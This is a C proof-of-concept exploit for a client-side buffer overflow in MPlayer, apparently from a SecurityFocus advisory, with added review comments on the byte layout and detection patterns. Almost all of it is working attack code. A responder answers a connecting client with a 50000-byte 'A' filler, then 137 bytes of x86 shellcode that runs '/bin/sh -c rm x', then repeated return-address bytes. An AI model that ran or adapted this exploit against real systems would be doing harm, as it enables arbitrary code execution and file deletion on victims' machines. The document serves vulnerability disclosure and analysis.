// source: https://www.securityfocus.com/bid/11962/info
// A remote, client-side buffer overflow vulnerability reportedly affects MPlayer. The issue is caused by the application failing to validate the length of user-supplied strings before copying them into static process buffers.
// An attacker may exploit this issue to execute arbitrary code with the privileges of the user running the vulnerable application. This may facilitate unauthorized access or privilege escalation.
/*
 * payload: 137-byte blob that main() writes to stdout between its 'A'
 * filler and the repeated 4-byte trailer.
 *
 * NOTE(review): the first 78 bytes look like 32-bit x86 machine code; the
 * byte pair 0xcd 0x80 (a software-interrupt instruction on x86) occurs
 * twice. What the code does when executed has not been verified here --
 * presumably it runs the command held in the ASCII tail and then exits;
 * confirm by disassembling in an isolated analysis environment.
 *
 * The last 59 bytes are printable ASCII and form a fixed pattern that can
 * be matched when searching captures or files for this sample:
 *   "abcdefghijklmnopqrstuvwx"
 *   "PATH=/bin:/usr/bin /bin/sh -c rm x."
 */
char payload[] = {
    /* bytes 0..77: non-printable prefix (see NOTE above) */
    0xeb ,0x47
    ,0x59
    ,0x89 ,0xca
    ,0x83 ,0xc2 ,0x18
    ,0x89 ,0x11
    ,0x31 ,0xc0
    ,0x89 ,0x41 ,0x04
    ,0x83 ,0xc2 ,0x13
    ,0x89 ,0x51 ,0x08
    ,0x83 ,0xc2 ,0x08
    ,0x89 ,0x51 ,0x0c
    ,0x83 ,0xc2 ,0x03
    ,0x89 ,0x51 ,0x10
    ,0x89 ,0x41 ,0x14
    ,0x88 ,0x41 ,0x2a
    ,0x88 ,0x41 ,0x32
    ,0x88 ,0x41 ,0x35
    ,0x88 ,0x41 ,0x3a
    ,0x51
    ,0x83 ,0xc1 ,0x08
    ,0x51
    ,0x83 ,0xc1 ,0x20
    ,0x83 ,0xc1 ,0x03
    ,0x51
    ,0x83 ,0xc0 ,0x3b
    ,0x50
    ,0xcd ,0x80
    ,0x31 ,0xc0
    ,0x50
    ,0x40
    ,0x50
    ,0xcd ,0x80
    ,0xe8 ,0xb4 ,0xff ,0xff ,0xff
    /* bytes 78..101: ASCII "abcdefghijklmnopqrstuvwx" */
    ,0x61 ,0x62 ,0x63 ,0x64 ,0x65 ,0x66
    ,0x67 ,0x68 ,0x69 ,0x6a ,0x6b ,0x6c
    ,0x6d ,0x6e ,0x6f ,0x70 ,0x71 ,0x72
    ,0x73 ,0x74 ,0x75 ,0x76 ,0x77 ,0x78
    /* bytes 102..136: ASCII "PATH=/bin:/usr/bin /bin/sh -c rm x." */
    ,0x50 ,0x41 ,0x54 ,0x48 ,0x3d ,0x2f
    ,0x62 ,0x69 ,0x6e ,0x3a ,0x2f ,0x75
    ,0x73 ,0x72 ,0x2f ,0x62 ,0x69 ,0x6e
    ,0x20 ,0x2f ,0x62 ,0x69 ,0x6e ,0x2f
    ,0x73 ,0x68 ,0x20 ,0x2d ,0x63 ,0x20
    ,0x72 ,0x6d ,0x20 ,0x78 ,0x2e
} ;
#include <stdio.h>
/*
 * Proof-of-concept responder for the MPlayer client-side overflow described
 * in the header of this file.
 *
 * Every read is a recv() on descriptor 0 and every write goes to stdout, so
 * the program expects a connected socket as its standard input and output
 * (presumably it is launched by a superserver such as inetd -- the page does
 * not say). The page also does not name the protocol or the MPlayer code
 * path involved.
 *
 * Exchange, in order:
 *   1. recv, reply "hello\n" (flushed)
 *   2. recv, reply "hello\n" (flushed)
 *   3. recv, reply 8 bytes of 0x03 (flushed)
 *   4. recv, then with no intermediate fflush: 12 bytes of 0x03,
 *      50000 bytes of 'A', the 137-byte payload[], the text "123", and
 *      20000 repeats of the byte sequence 01 15 bb bf.
 *
 * For detection: the last reply is 130152 bytes, dominated by a long run of
 * 'A' followed by a repeating 4-byte pattern; the printable tail of
 * payload[] sits between the two. For remediation, the header text places
 * the defect in the client: string lengths are not validated before being
 * copied into fixed-size buffers.
 *
 * NOTE(review): `len` is overwritten by each recv() and never examined, so
 * the content and size of what the client sent are ignored; `s` is unused.
 */
main()
{
    char buf[256];   /* scratch space for the client's requests; contents unused */
    int len;
    int s,i;

    /* Step 1: wait for the first client message, answer with a greeting. */
    len=recv(0,buf,256,0);

    printf("hello\n");
    fflush(stdout);

    /* Step 2: same again. */
    len=recv(0,buf,256,0);

    printf("hello\n");
    fflush(stdout);

    /* Step 3: third client message is answered with eight 0x03 bytes. */
    len=recv(0,buf,256,0);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    fflush(stdout);

    /* Step 4: fourth client message; everything below is the oversized reply. */
    len=recv(0,buf,256,0);
    /* twelve 0x03 bytes precede the filler */
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    putchar(0x03);
    /* 50000 bytes of filler */
    for (i=0;i<50000;i++)
        putchar('A');
    /* payload[] byte for byte (sizeof counts all 137 initialisers) */
    for (i=0;i<sizeof payload;i++)
        putchar (payload[i]);

    printf("123");
    /*
     * Author's note: "RA all the way....".
     * NOTE(review): presumably RA = return address; the four bytes would
     * read as 0xbfbb1501 on a little-endian 32-bit target -- not confirmed
     * by anything else on the page.
     */
    for (i=0;i<20000;i++) // RA all the way....
    {
        putchar(0x01);
        putchar(0x15);
        putchar(0xbb);
        putchar(0xbf);
    }
    /* push out whatever stdio still has buffered */
    fflush(stdout);
}